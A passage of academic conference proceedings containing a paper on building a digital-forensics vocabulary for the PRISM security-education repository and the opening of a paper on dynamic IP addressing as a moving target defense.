Quality Outlook at Source Code Level", Journal of Software Engineering and Applications, vol. 1, no. 1, pp.<br />

88.<br />

Wilkes, J. 1997, "Business Ethics: A <strong>European</strong> Review, Focus: 'Protecting the Public, Securing the Profession:'<br />

Enforcing Ethical Standards among Software Engineers"<br />

75


Building an Improved Taxonomy for IA Education<br />

Resources in PRISM<br />

Vincent Garramone and Daniel Likarish<br />

Regis University, Denver, USA<br />

garra909@regis.edu<br />

dlikaris@regis.edu<br />

Abstract: To address a perceived lack of availability of educational resources for students and educators in the<br />

field of information assurance, Regis University and the United States Air Force Academy (USAFA) have begun<br />

development of a web portal to store and make available to the public information security-related educational<br />

materials. The portal is named the Public Repository for Information Security Materials (PRISM). In this paper, we<br />

begin with a review of the initial vision for PRISM. We then discuss the development and maintenance of a<br />

deterministic discipline-specific vocabulary, along with the results of mapping curricular content to our initial set of<br />

terms. Out of the eight material descriptions used in our evaluation, five could be clearly mapped to the initial<br />

vocabulary, one could partially be mapped, and three did not contain any clearly mappable terms.<br />

Keywords: PRISM, security education, taxonomy, educational resources<br />

1. Introduction<br />

As more of our lives become increasingly dependent on information technology, educating those who<br />

develop and manage those technologies about information assurance (IA) concepts is crucial to help<br />

reduce the risks of our information being lost, stolen or otherwise compromised. Recent attendance at<br />

national conferences for educators (e.g. ISECON (International Systems Educators <strong>Conference</strong>),<br />

CISSE (Colloquium for Information Systems Security Education) and AMCIS (Americas <strong>Conference</strong><br />

on Information Systems)) provided an opportunity to determine the need for security courses and<br />

materials to support them. The organization and promotion of Security Special Interest Groups<br />

(SecSIG) and increase in the number and variety of security education papers also demonstrates the<br />

increased interest in the field, and the trend has culminated in national recognition that security<br />

education is a national and international concern, (Cooper et al 2010).<br />

Unfortunately, aligning existing educational programs to include a focus on security topics has proven<br />

not to be straightforward. For example, although some institutions report success adding securityspecific<br />

courses to existing curricula, others find this infeasible because of the significant instruction<br />

time and expertise it requires (Null 2004). As an alternative to adding a security-specific course,<br />

relevant lessons can be integrated into existing courses to teach security concepts (Irvine, Chin, and<br />

Frincke 1998). Instructors wishing to add lessons to existing courses must either create or locate<br />

materials that meet their particular curricular needs. Similar to creating and integrating entire courses,<br />

some instructors may not have the time or expertise to develop effective lessons for every topic they<br />

wish to teach. They also recognize the non-uniqueness of lesson materials and see limited utility in<br />

reinvention of materials that they suspect others have developed, (Davis 2010).<br />

To help address these issues and advance the availability of information security education materials,<br />

Regis University and USAFA have initiated a collaborative effort to develop a web portal to store and<br />

make available to the general public information security related educational materials, research,<br />

virtual exercises, and links to security resources. The PRISM web portal will provide an online virtual<br />

space for educators to discuss effective pedagogy, share tools, and collaborate on curriculum<br />

development.<br />

This paper reviews the current vision for the PRISM repository and discusses the development of a<br />

deterministic taxonomy based method of organizing content. The use of deterministic, portal site<br />

analytics is proposed to further improve the forensics content taxonomy and the load process.<br />

2. Vision<br />

The creators of the Public Repository for Information Security Materials (PRISM) web portal intend to<br />

make it a resource for students and educators who are interested in information security education.<br />

Visualization tools, publications, educational materials, links to relevant websites, and research data<br />

are all potential types of material. We envision that individuals, educators and students from K-<br />

Collegiate will contribute to the materials on the site in an ad hoc fashion. The site is a civic commons<br />

76


Vincent Garramone and Daniel Likarish<br />

portal that relies on the goodwill of participants to contribute content. Future versions of the site will<br />

use publication (e.g. blogs, podcasts, articles) to encourage participants to return to the site for<br />

reasons beyond the teaching materials. In addition, the site has the potential to serve as a<br />

collaborative workspace to discuss tools and teaching methods in both synchronous and<br />

asynchronous modes, and to participate in educational games and online activities.<br />

Part of this effort involves determining the most useful way to classify and organize resources<br />

available on the site. Information security is a broad and complex field of study, and one can quickly<br />

become mired in results irrelevant to their interests when conducting keyword searches. Moreover, it<br />

may be difficult to identify terms that will be most useful in locating specific materials within any given<br />

repository (Dicheva and Dichev 2006), especially since many repositories tend to use very general<br />

metadata definitions that lack the specificity required to effectively locate resources (Moisey 2006).<br />

We anticipate an improved method for locating relevant material with carefully crafted taxonomies,<br />

constructed by analyzing vocabulary usage in curricular literature and actual site searches.<br />

3. Background<br />

In early 2010, PRISM was available to the public. For a complete treatment of initial vision,<br />

requirements, and technical execution, see (Garramone and Schweitzer 2010). The web portal was<br />

designed with a high degree of flexibility to allow the project to mold itself to the changing needs of the<br />

community. Ease of use for content seekers and developers, as well as for site moderators and<br />

administrators was given priority when selecting the hardware and software components of PRISM.<br />

An initial set of seven publications and eleven interactive lessons was provided by Dr. Schweitzer and<br />

the US Air Force Academy to showcase the types of resources PRISM was designed to contain. A<br />

handful of materials from other sources were also posted to demonstrate potential content types such<br />

as hyperlink resources and educational simulations. Resources were categorized using a custom set<br />

of vocabularies designed to allow users from heterogeneous backgrounds to access the materials<br />

using familiar terms.<br />

In particular, a subset of the Dublin Core (Weibel et al 2008) provided standard metadata.<br />

Additionally, vocabularies from two prominent IA common bodies of knowledge (CBK) (Theoharidou<br />

and Gritzalis 2007) were implemented to organize resources according to their IA topical content.<br />

Although PRISM is a fully functional repository, several challenges remain. Organizing content based<br />

on static metadata sets proves difficult as usage patterns and industry terminology change.<br />

Furthermore, complex tagging requirements for content makes it difficult for developers to contribute<br />

their content. In their recent IEEE transaction on Learning Technologies, Davis et al. describe the<br />

more general sharing and deposition of education materials by small colleges and university in<br />

common repositories (2010). The failure to develop sustainable material repositories is the result of<br />

poor design decisions, user’s motivation to use them and failure of adoption by communities is related<br />

to difficulty of use, administration and currency of materials.<br />

4. Dynamic taxonomy based content management<br />

Previous attempts to establish education web portals have been less than successful from lack of<br />

participation by resource developers and cumbersome site search strategies to locate interesting<br />

course materials. The upload of resources requires developers to provide metadata descriptors of<br />

their materials based on a fixed taxonomy. Because of the wide variance in resource content, static<br />

taxonomies based on generic structures inherited through the parent portal developer’s best efforts<br />

are not effective. From the resource downloader’s perspective, attempts to retrieve materials are<br />

discouraging because of difficulty in searching for materials described by the same limited taxonomy.<br />

For example, the Merlot educational material repository, the most granular taxonomic term for<br />

information assurance materials is “Security” under the “Information Technology” heading. This<br />

provides no terminology guidance for those submitting or searching for content, and forces users to<br />

resort to keyword searches.<br />

We used the PRISM portal to investigate a simple, deterministic approach to creating a flexible and<br />

stable taxonomic structure that would allow forensics educators to upload resources and search<br />

content in a more easy and useful way. Our approach consisted of generating an initial list of<br />

forensics descriptors that were manually extracted from current forensics literature and ranked<br />

according to what percentage of the documents each term appeared in. The content of a computer<br />

77


Vincent Garramone and Daniel Likarish<br />

forensics course was used to evaluate whether the literature based taxonomy approach would<br />

produce an acceptable description of the material. The result of the evaluation confirmed that a<br />

literature based seeded taxonomy was a good starting point, but that refinement is necessary. The<br />

digital forensics topic was chosen as our initial case because Regis University wanted to make lab<br />

materials from its computer forensics course available on the PRISM site and felt these materials<br />

would be representative of content for a graduate forensics class. The weekly lab materials were<br />

qualitatively evaluated using the list of forensics terms derived from current forensics literature. These<br />

results were then compared to actual terms in the lab topic descriptions given in the course syllabus.<br />

4.1 Granularizing PRISM taxonomies<br />

One of the major goals of PRISM is to make searching for content intuitive and efficient. To achieve<br />

this, content must be tagged in a way that allows keyword and guided searches to return accurate<br />

results. Since IA terminology varies widely among researchers and practitioners, we have tried to<br />

accommodate the broadest possible group of users by developing several taxonomies to tag content.<br />

After a resource has been associated with a particular taxonomy term, it can automatically be<br />

included in guided searches and is reachable with the advanced search function of PRISM. At the<br />

conclusion of the first major development phase, PRISM was equipped with both the International<br />

Information Systems Security Certification Consortium (Theoharidou and Gritzalis 2007) and U.S.<br />

Department of Homeland Security CBK vocabularies (Shoemaker, Drommi, Ingalsbe and Mead<br />

2007). However, in simple use cases existing vocabularies did not offer a sufficient level of specificity.<br />

Rather than create arbitrary lists of terms a researcher might personally want to search for, it was<br />

decided to review the literature and attempt to distill vocabularies that would reflect common usage<br />

among curriculum developers.<br />

The first effort to granularize the PRISM taxonomies was in the area of digital forensics. Digital<br />

forensics is its own discipline within the realm of information security (Berghel 2003). On this basis,<br />

forensics is considered an ideal candidate for a descriptive taxonomy within PRISM. PRISM<br />

researchers analyzed nine recent publications, primarily from curriculum developers, to identify a<br />

common taxonomic structure and current terminology usage. These publications were selected for<br />

their recent contribution and, based on the level of repetition of terms observed, were considered<br />

adequate in number and scope to generate an initial forensics vocabulary for PRISM. The digital<br />

forensics vocabulary currently being used in PRISM contains the most commonly observed digital<br />

forensics terms from these nine papers, and will explicitly specify relationships between synonyms as<br />

they are identified through site analytics. Table 1 shows the initial list of terms implemented within<br />

PRISM (See Appendix 1 for the complete table). To keep the list to a manageable size, only terms<br />

referenced in at least one third of the papers analyzed were included in this initial vocabulary.<br />

Table 1: PRISM’s initial digital forensics vocabulary<br />

Forensics Topics<br />

Reference Count<br />

Legal Process<br />

6<br />

Log Analysis<br />

6<br />

Data Acquisition 5<br />

Data Decryption 5<br />

Deleted Data Recovery 5<br />

Email Forensics 5<br />

Hidden Data Discovery 5<br />

Steganography 5<br />

Documentation 4<br />

Ethics 4<br />

Network Forensics 4<br />

Incident Response 3<br />

Live System Forensics 3<br />

Malware Detection 3<br />

Password Cracking 3<br />

Registry Analysis 3<br />

78


Vincent Garramone and Daniel Likarish<br />

To avoid creating too much predefined structure and possibly over-restricting the way users interact<br />

with the site, a single, flat vocabulary of forensics-related terms was defined, as opposed to a<br />

hierarchical one. This allows accommodation of user variance between how they define and use<br />

terms. Furthermore, terms that refer to conceptual subsets of other terms are included in the<br />

vocabulary because they are apparently often used independently of their parent terms in the<br />

literature. For example, “Steganography” could be conceptually categorized as “hidden data<br />

discovery”, but more than half of the papers examined explicitly mentioned the former term. This is an<br />

example of a deterministic approach: allowing actual usage or terms to dictate taxonomy<br />

development.<br />

4.2 Dealing with added complexity<br />

As the taxonomy structure becomes more complex, a tradeoff between the ease of content searching<br />

and the difficulty of content submission is made. To offset the effects of PRISM’s more complex<br />

taxonomy system, PRISM moderators will categorize content for developers. By offering this service,<br />

content submission difficulty will be reduced, requiring only the submission of a link or the upload of<br />

an archive to be posted.<br />

4.3 A trial of the system<br />

We used Regis University’s Computer Forensics course to evaluate the list of terms derived from the<br />

literature (Table 1) and their ability to describe the computer forensics materials. The premise of the<br />

course is to introduce the student to a wide variety of methods for investigating computer security<br />

incidents. Each student takes on the role of a forensic analyst and each week the student is asked to<br />

apply their skills to the analysis of many different types of data with different scenarios and tools. The<br />

students have to create log entries detailing their findings as they work through the process of<br />

analyzing the data for each scenario. First, we chose terms from the vocabulary that we felt<br />

represented the lab content and learning intent. These lists, given in Table 2, column 2, represent the<br />

values a content creator would assign to their own materials upon upload to the PRISM site. Next<br />

those terms were compared with actual language used to describe the lab content in the course<br />

syllabus, and a rating was given to the level of similarity between the available vocabulary terms and<br />

those explicitly listed in the lab topic descriptions. A “Yes” value suggests that the terminology was<br />

sufficiently similar to allow someone not familiar with the content of the lab to effectively classify data<br />

using only a brief description. A “Partial” value means that one or more, but not all of the vocabulary<br />

terms are reflected in the lab topic description. In this case, a material might not be classified under all<br />

relevant terms, making it difficult to locate on the site. As an example, the lab described in the first row<br />

of Table 2 might only be classified as an “Email Forensics” material since “Documentation” and “Legal<br />

Process” are not explicitly mentioned in the description. Finally, a “No” designation is given if none of<br />

the relevant vocabulary terms are present in the lab topic description.<br />

Table 2: Summary of the weekly lab topics MSIA 680 Computer Forensics course and related PRISM<br />

forensics vocabulary terms<br />

Lab Topics from Syllabus Related PRISM Forensics Terms Match<br />

Email Forensics and the Forensic Template. Also<br />

Email Forensics<br />

Partial<br />

write a preface justifying the forensic approach.<br />

Documentation<br />

Legal Process<br />

Snort alert data and Wireshark packet capture<br />

Network Forensics<br />

No<br />

Network Security Podcast Report<br />

Log Analysis<br />

Live Response, Volatile & Nonvolatile Data, Cache<br />

Dump<br />

Live System Forensics Yes<br />

RAPIER Tool Analysis. End with analysis of the<br />

Log Analysis<br />

No<br />

Strength and Weakness of Forensic Tools and<br />

Hidden Data Discovery<br />

Processes<br />

Documentation<br />

Tool Validation*<br />

Registry Examination and Tool usage Registry Analysis Yes<br />

File Analysis Lab Hidden Data Discovery No<br />

Active Malware Discovery (Trojans) and Memory<br />

Examination<br />

Rootkit Examination and research of additional<br />

risks and methods of detection<br />

79<br />

Malware Detection<br />

Hidden Data Discovery<br />

Malware Detection<br />

Yes<br />

Yes


Vincent Garramone and Daniel Likarish<br />

Note: A positive in the Match column indicates that the seeded taxonomy terms were closely or<br />

exactly reflected in the Regis lab topic.<br />

This rudimentary analysis demonstrated that seeding the forensics vocabulary with terms extracted<br />

from a public literature search might be sufficient to allow a moderator to characterize the uploaded<br />

material without intimate knowledge of its contents. See Appendix 2 for a visual representation of this<br />

mapping in table form for the course MSIA 682, Network Forensics. It is clear, however, that the initial<br />

vocabulary could benefit from adjustments. For example, the lab description in row 2 of Table 2<br />

mentions, “packet capture”. While this is not in the initial vocabulary, it is closely related to “Network<br />

Forensics” and “Packet Analysis”. Network Forensics was included in the initial list and Packet<br />

Analysis, while identified in the literature, was not for reasons described above. To address this, it<br />

might be appropriate to replace “Network Forensics” with “Packet Analysis” in the PRISM vocabulary.<br />

Alternatively, defining the relationship of these terms in PRISM (synonyms, subtopics, etc.) might<br />

create a more inclusive and useful search environment.<br />

4.4 Honing the vocabulary<br />

The artifact constructed through literature review is, as mentioned, a starting point in the development<br />

of an optimized digital forensics vocabulary for PRISM. It remains to be seen if these terms resonate<br />

with other users of the web portal or if different descriptors will be favored. Moreover, terminology<br />

changes over time, and PRISM’s vocabularies should be able to accommodate those changes. The<br />

authors plan to utilize new content and analytics data to identify discrepancies between the<br />

vocabulary defined above, and actual topics and terms utilized by PRISM users. PRISM records all<br />

searches performed on the site and generates reports listing common phrases. Searches are also<br />

tracked by Google Analytics, which provides a more in-depth view of searches executed on the site,<br />

as well as visitor behavior before and after the search. After a particular search is executed, Google<br />

services can be used to determine user’s preferred or selected materials. This capability can provide<br />

insight into how accurate and relevant the taxonomies are at any given time. As long as usage of the<br />

site continues, these tools will help PRISM moderators to maintain relevant IA vocabularies from<br />

which content can be described.<br />

5. Conclusions<br />

IA is a rapidly changing field, and maintaining relevance is a difficult task. We are attempting to keep<br />

PRISM responsive to changes in the IA landscape. PRISM developers will continue to make<br />

adjustments based on the needs of the user community by allowing current literature and actual<br />

usage statistics to guide the development of organizational taxonomies. Explicitly attaching these<br />

relevant descriptors to site content allows administrators to produce intuitive, guided search<br />

functionalities, making it easier for users to locate the materials they need. Results using our own<br />

materials as a test case suggest that taxonomies constructed in this way could be effective for other<br />

users. A more rigorous evaluation will only be possible if site utilization increases and is sustained<br />

over a significant period of time. To this end, PRISM moderators recognize, and are prepared to<br />

absorb, the increased work required to properly organize content on the site as taxonomic complexity<br />

increases. This will hopefully make using the site more attractive to content developers and, in turn, to<br />

those seeking educational resources.<br />

6. Appendix 1: Terminology usage matrix<br />

Forensics Topics Totals<br />

Legal Process [1] [3] [5] [6] [11] [12] 6<br />

Log Analysis [1] [3] [5] [6] [11] [13] 6<br />

Data Acquisition [1] [2] [3] [12] [13] 5<br />

Data Decryption [1] [2] [5] [11] [12] 5<br />

Deleted Data Recovery [1] [3] [6] [11] [12] 5<br />

Email Forensics [2] [3] [5] [6] [13] 5<br />

Hidden Data Discovery [1] [2] [3] [11] [12] 5<br />

Steganography [1] [5] [11] [12] [13] 5<br />

Documentation [1] [2] [5] [13] 4<br />

Ethics [6] [11] [12] [13] 4<br />

80


Vincent Garramone and Daniel Likarish<br />

Forensics Topics Totals<br />

Network Forensics [3] [6] [11] [13] 4<br />

Incident Response [11] [12] [15] 3<br />

Live System Forensics [1] [3] [15] 3<br />

Malware Detection [3] [11] [12] 3<br />

Password Cracking [2] [5] [13] 3<br />

Registry Analysis [3] [6] [13] 3<br />

Hardware Identification [2] [6] 2<br />

Tool Development [3] [11] 2<br />

Web Browser Forensics [6] [13] 2<br />

Baselining [3] 1<br />

Application Analysis [6] 1<br />

Data Reconstruction [6] 1<br />

Forensic Planning 1<br />

Key Loggers [3] 1<br />

Dead System Forensics [15] 1<br />

Packet Analysis [6] 1<br />

Password Auditing [3] 1<br />

RFID Forensics [6] 1<br />

Tool Validation [11] 1<br />

Web Services [6] 1<br />

Evidence Collection and Handling [5] 1<br />

Key Authors Year Country Subject<br />

[1] Bem, D. and Huebner, E. 2008 Australia Curriculum<br />

[2] Berghel, H. 2003 USA Definition<br />

[3] Crowley, E. 2007 USA Curriculum (corporate)<br />

[5] Figg, W. and Zhou, Z. 2007 USA Curriculum<br />

[6] Francia, G. A. 2006 USA Curriculum<br />

[11] Troell, L., Pan, Y., and Stackpole, B. 2003 USA Curriculum<br />

[12] Troell, L., Pan, Y., and Stackpole, B. 2004 USA Curriculum<br />

[13] Wassenaar, D., Woo, D., and Wu, P. 2009 USA Curriculum<br />

[15] Yen, P., Yang, C., and Ahn, T. 2009 Taiwan Process<br />

7. Appendix 2: MSIA 682, Network Forensics course topics and activities<br />

mapped to PRISM forensics vocabulary<br />

Course Topic Activity Description<br />

Introduction to Security<br />

Monitoring<br />

Intro Security packet data<br />

structure based on the<br />

TCP/IP model<br />

81<br />

Example of a granular<br />

Lab Activity<br />

Identify the following<br />

packet structures by<br />

explaining what each<br />

packet is, what ports,<br />

protocols or codes<br />

each one uses using<br />

the static packet<br />

captures<br />

PRISM Forensics<br />

vocabulary<br />

Network forensics


Vincent Garramone and Daniel Likarish<br />

Course Topic Activity Description<br />

Protocol Analysis After understanding packet<br />

data structures. Examine<br />

different types of network<br />

services using standard<br />

sniffing tools<br />

Metadata and Statistical<br />

Analysis<br />

Session Data, Intrusion<br />

Detection and Alert Data<br />

Normal, Suspicious and<br />

Malicious Traffic<br />

References<br />

Decompose packets for<br />

the content: metadata and<br />

other attributes using<br />

packet capture files<br />

Investigate layer three and<br />

four session data using the<br />

Network Security<br />

Management Framework<br />

Examples of normal,<br />

suspicious and malicious<br />

traffic based on pcap files<br />

Example of a granular<br />

Lab Activity<br />

Explain the following<br />

tcpdump flags: -v, -n, -<br />

i, -r, -w, -e, -t, -x, -X, -<br />

s, -D, -q, -L, identity<br />

which flags that can<br />

be used more than<br />

once? Please use<br />

7.pcap file for this<br />

exercise.<br />

Examine the files<br />

1.pcap through 6.pcap<br />

using either Netdude<br />

or Wireshark<br />

explaining what<br />

protocols are in use,<br />

whether they use UDP<br />

or TCP and what ports<br />

are used for each<br />

protocol.<br />

Please review the<br />

nfsen video to review<br />

the capabilities of<br />

nfsen (a web front<br />

end) and nfdump, the<br />

netflow<br />

collector/provider<br />

Please examine pcap<br />

files 1-7 and identify<br />

the type of traffic and<br />

whether or not it would<br />

be normal, suspicious<br />

or malicious.<br />

PRISM Forensics<br />

vocabulary<br />

Network Forensics, Live<br />

Systems Forensics<br />

Log Analysis, Hidden<br />

Data Discovery<br />

Log Analysis, Hidden<br />

Data Discovery<br />

Malware Detection, Live<br />

Systems Forensics,<br />

Hidden Data Discovery<br />

Bem, D. and Huebner, E. (2008) “Computer forensics workshop for undergraduate students”, In Proceedings of<br />

the tenth conference on Australasian computing education, Vol. 78, Simon Hamilton and Margaret Hamilton<br />

(Eds.), Australian Computer Society, Inc., Darlinghurst, Australia, pp 29-33.<br />

Berghel, H. (2003) “The discipline of Internet forensics”, Communications of the ACM, Vol. 46, No. 8, pp 15-20.<br />

DOI= http://doi.acm.org/10.1145/859670.859687<br />

Cooper, S., Nickell, C., Piotrowski, V., Oldfield, B., Abdallah, A., Bishop, M., Caelli, B., Dark, M., Hawthorne, E.,<br />

Hoffman, L., Perez, L., Pfleeger, C., Raines, R., Schou, C., and Brynielsson, J. (2010) “An exploration of the<br />

current state of information assurance education”, SIGCSE Bull, Vol. 41, No. 4, pp 109-125.<br />

DOI=10.1145/1709424.1709457<br />

Crowley, E. (2007) “Corporate forensics class design with open source tools and live CDS”, J. Comput. Small<br />

Coll. Vol. 22, No. 4, pp 170-176.<br />

Davis, H., Carr, L., Hey, J., Howard, Y., Millard, D., Morris, D., and White, S. (2010) “Bootstrapping a culture of<br />

sharing to facilitate open educational resources”, IEEE Transactions on Learning Technologies, Vol. 3, No.<br />

2, pp 96-109.<br />

Dicheva, D. and Dichev, C. (2006) “Tm4l: creating and browsing educational topic maps”, British Journal of<br />

Educational Technology, Vol. 37, No. 3, pp 391-404.<br />

Figg, W. and Zhou, Z. (2007) “A computer forensics minor curriculum proposal”, J. Comput. Small Coll, Vol. 22,<br />

No. 4, pp 32-38.<br />

Francia, G. A. (2006) “Digital forensics laboratory projects”, J. Comput. Small Coll, Vol. 21, No. 5, pp 38-44.<br />

Garramone, V. and Schweitzer, D. (2010) “PRISM: A public repository for information security material”, In<br />

Proceedings from the 14th Annual Colloquium for Information Systems Security Education, Baltimore, MD.<br />

Irvine, C., Chin, S., and Frincke, D. (1998) “Integrating security into the curriculum”, Computer, Vol. 31, No. 12,<br />

pp 25-30.<br />

Moisey, S. Alley, M. & Spencer, B. (2006) “Factors affecting the development and use of learning objects”, The<br />

American Journal of Distance Education, Vol. 20, No. 3, pp 143-161.<br />

Null, L. (2004) “Integrating security across the computer science curriculum”, Journal of Computing Sciences in<br />

Colleges, Vol. 19, No. 5, pp 170-178.<br />

Peisert, S., Bishop, M., and Marzullo, K. (2008) “Computer forensics in forensics”, SIGOPS Oper. Syst. Rev., Vol.<br />

42, No. 3, pp 112-122. DOI= http://doi.acm.org/10.1145/1368506.1368521<br />

82


Vincent Garramone and Daniel Likarish<br />

Schweitzer, D. and Boleng, J. (2009) “Designing web labs for teaching security concepts”, J. Comput. Small Coll.,<br />

Vol. 25, No. 2, pp 39-45.<br />

Shoemaker, D., Drommi, A., Ingalsbe, J.A., and Mead, N.R. (2007) “A comparison of the software assurance<br />

common body of knowledge to common curricular standards”, Software Engineering Education & Training,<br />

2007, pp 149-156.<br />

Theoharidou, M. and Gritzalis, D. (2007) “Common body of knowledge for information security”, Security &<br />

Privacy, IEEE, Vol. 5, No. 2, pp 64-67. DOI=10.1109/MSP.2007.32<br />

Troell, L., Pan, Y., and Stackpole, B. (2003) “Forensic course development”, In Proceedings of the 4th<br />

<strong>Conference</strong> on information Technology Curriculum, 16-18 October, ACM, New York, NY, pp 265-269.<br />

DOI=http://doi.acm.org/10.1145/947121.947180<br />

Troell, L., Pan, Y., and Stackpole, B. (2004) “Forensic course development: one year later”, In Proceedings of the<br />

5th <strong>Conference</strong> on information Technology Education, 28-30 October, ACM, New York, NY, pp 50-55.<br />

DOI=http://doi.acm.org/10.1145/1029533.1029547<br />

Wassenaar, D., Woo, D., and Wu, P. (2009) “A certificate program in computer forensics”, J. Comput. Small Coll.,<br />

Vol. 24, No. 4, pp 158-167.<br />

Weibel, S., Kunze, J., Lagoze, C. and Wolf, M. (1998) “Dublin Core Metadata for Resource Discovery”, RFC<br />

Editor. US<br />

Yen, P., Yang, C., and Ahn, T. (2009) “Design and implementation of a live-analysis digital forensic system”, In<br />

Proceedings of the 2009 international <strong>Conference</strong> on Hybrid information Technology, 27-29 August, Vol.<br />

321, ACM, New York, NY, pp 239-243. DOI=http://doi.acm.org/10.1145/1644993.1645038<br />

83


Using Dynamic Addressing for a Moving Target Defense<br />

Stephen Groat, Matthew Dunlop, Randy Marchany and Joseph Tront<br />

Virginia Polytechnic Institute and State University, Blacksburg, USA<br />

sgroat@vt.edu<br />

dunlop@vt.edu<br />

marchany@vt.edu<br />

jgtront@vt.edu<br />

Abstract: Static network addressing allows for attackers to geographically track hosts and launch network<br />

attacks. While technologies such as DHCP claim dynamic addressing, the majority of network addresses<br />

currently deployed are static for at least a session. Dynamic addresses, changing multiple times within a session,<br />

disassociate a user with a static address. This disassociation is important since a static address can be used to<br />

identify a host and makes targeting the host for attack feasible. We propose using dynamic addressing, in which<br />

hosts’ addresses change multiple times per session, to create a moving target defense. Analyzing the primary<br />

factors which contribute to the security of dynamic addressing, we statistically evaluate the validity of this<br />

technique as a network defense. We then identify the optimal characteristics of a network-layer moving target<br />

defense that uses dynamic addressing.<br />

Keywords: moving target defense, network address security, privacy, dynamic addressing<br />

1. Introduction<br />

As computers and networks become embedded in critical services throughout society, the privacy and<br />

security implications of fixed network addresses expose users to tracking and attack. Specifically, at<br />

the link layer, Media Access Control (MAC) addresses associated with a network interface are<br />

susceptible to flooding and spoofing attacks. At the network layer, Internet Protocol (IP) addresses<br />

are susceptible to spoofing, tracking, and targeting. Both the MAC and IP addresses of servers and<br />

other host machines are usually static to allow for clients to successfully communicate. These static<br />

addresses often leave servers vulnerable to attack because these fixed addresses are easy targets to<br />

locate. If the host is compromised, an attacker can create a denial of service (DoS) attack on the<br />

server which affects all attached clients. Another concern is mobile hosts whose non-changing<br />

network addresses can be geotemporally tracked, compromising user's privacy.<br />

We explore the variables that impact how effectively dynamic IP addressing protects hosts and the<br />

impact these variables have on each other. One variable is the number of dynamic bits in the<br />

address, or bits available to change. The fewer dynamic bits, the more likely an attacker can use brute<br />

force techniques to correlate addresses. Another variable is the frequency of the address change. An<br />

address with fewer dynamic bits needs to change more often to avoid identification. No temporary<br />

address can remain static for too long without risking data correlation. A third variable to consider is<br />

the population density of the address space or subnet. A sparsely populated subnet would make<br />

address identification easier for the attacker since fewer addresses are in use. Alternatively, a densely<br />

populated subnet would make address identification considerably more challenging due to the<br />

additional hosts creating traffic on the network. Although it is easy to simply maximize all the<br />

variables, computational overhead prevents this. Minimizing computational expense is particularly<br />

important for power-constrained devices.<br />

To combat the security and privacy concerns of non-changing addressing, we analyze how dynamic<br />

network addressing would increase security, privacy, and reliability. Dynamic addressing refers to<br />

addresses in which some or all of the address non-deterministically changes, possibly even midsession.<br />

Dynamic addressing prevents would-be attackers from tracking users over time and as they<br />

move through different networks, because the changing addresses cannot be correlated to a single<br />

user. Dynamic addressing also protects against traffic correlation by network sniffing attacks because<br />

of the difficulty of associating a user with a changing address. Dynamic addressing provides<br />

additional security by creating a moving target defense at the network layer that prevents attackers<br />

from targeting specific machines. The increased security offered by dynamic network addressing<br />

protects privacy and data for network users.<br />

To analyze the use of dynamic addresses in creating a moving target defense, the remainder of the<br />

paper is organized as follows. Static addresses and their associated security risks are discussed in<br />

Section 2. Related work is surveyed in Section 3, focused on analyzing the need for address privacy.<br />

84


Stephen Groat et al.<br />

Sections 4 and 5 analyze the different factors which affect the security of a dynamic address and how<br />

these factors affect each other. Section 6 uses statistical simulation results to validate our security<br />

analysis of dynamic addressing factors. In Section 7, we discuss specific security advantages offered<br />

by dynamic addresses. Future work planned to demonstrate a dynamic addressing approach is<br />

discussed in Section 8 and we conclude in Section 9.<br />

2. Problem<br />

Static addresses are necessary to allow users to repeatedly find resources. Without providing a<br />

notification of an address change, users must have a single, static identifier to locate resources. For<br />

example, IP addresses, whether static or dynamic, are often connected with Domain Name System<br />

(DNS) names. DNS names are updated with the current IP address to facilitate location of resources<br />

on the Internet with an easily recognizable value. Without a static value connected to networked<br />

resources, whether DNS names or IP addresses, users would be unable to find the resources. Even<br />

Dynamic Host Configuration Protocol (DHCP) leased addresses, which are widely assumed to be<br />

dynamic, rarely change.<br />

While static addressing is critical to assist users in finding resources, static addresses allow malicious<br />

users to easily locate targets for attack. For example, DNS names and IP addresses are publically<br />

available static addresses. These vectors allow attackers to easily conduct scans to locate target<br />

hosts. Once a target is located, the attacker can focus on the target found and assume that the<br />

target’s static identifier will not change. An attacker is able to make this assumption since identifier<br />

changes would interrupt service for valid users. To ensure the reliability and security of service, critical<br />

services must deploy some sort of moving target defense that changes static identifiers while allowing<br />

continuity of service for trusted users.<br />

3. Related work<br />

The need for an anonymous network address to maintain security and privacy has been explored.<br />

Reiter and Rubin (1999) developed a scheme, called Crowds, to maintain IP address anonymity from<br />

web sites. The protocol uses other computers surfing the web to funnel web requests through. The<br />

effect is to create a crowd of users browsing web servers to hide web requests. Johnson et al. (2007)<br />

identified the need to anonymize addresses and built a trust model into Tor networks called Nymble.<br />

Nymble hides clients' IP addresses from servers. Shields et al. (2000) created another anonymity<br />

protocol named Hordes. Hordes’ focus is on creating a secure system that does not decrease network<br />

performance. All of these approaches focus on hiding the publicly available addresses by using<br />

complex support networks. We analyze the vectors that static address create for tracking and attack<br />

and recommend anonymizing the host address, which none of these three protocols addresses.<br />

Koukis et al. (2006) uses web site signatures and fingerprinting to determine host addresses in<br />

anonymized IP logs. This method is ineffective for tracking dynamic hosts, further demonstrating the<br />

potential security and privacy advantages of dynamic addresses.<br />

A number of researchers have focused on the potential dangers resulting from network address<br />

tracking in the Internet Protocol version 6 (IPv6). Dunlop et al. (2011) identified the dangers posed by<br />

auto-configured addresses in IPv6 and presented a taxonomy of methods to obscure addresses.<br />

Narten, Draves, and Krishnan (2007) also identified a privacy concern with IPv6 addresses and<br />

proposed a potential solution called privacy extensions. Privacy extensions can create new addresses<br />

for users each time they connect to a subnet. Bagnulo and Arkko (2006) also proposed a solution<br />

aimed at protecting IPv6 addresses. Their approach, called Cryptographically Generated Addresses<br />

(CGAs), uses a self-generated public key to obscure an address for each subnet. Neither privacy<br />

extensions nor CGAs dynamically obscure addresses and addresses remain the same until the user<br />

terminates the session. Even though the addresses are obscured, they typically remain static long<br />

enough for a malicious third party to gather information about the user.<br />

While we have discovered no other academic work considering the security and privacy effects of<br />

addressing, two patents attempt to utilize dynamic addressing for security. A technique by Sheymov<br />

(2010) is designed with the goal of dynamic obscuration. Sheymov's objective behind dynamic<br />

obscuration is to provide intrusion protection from certain classes of network attacks. While<br />

Sheymov’s method uses dynamic addressing, it relies on an Intrusion Detection System to trigger<br />

address changes. We analyze consistent dynamic address changes that require no additional<br />

systems to support. Fink et al. (2006) also propose a technique for dynamically obscuring host<br />

addresses called Adaptive Self-Synchronized Dynamic Address Translation (ASD). ASD uses<br />

85


Stephen Groat et al.<br />

symmetric keys established through a handshake process between a trusted sender and receiver<br />

enclave. This technique adds additional overhead due to repetition of the handshake process. A<br />

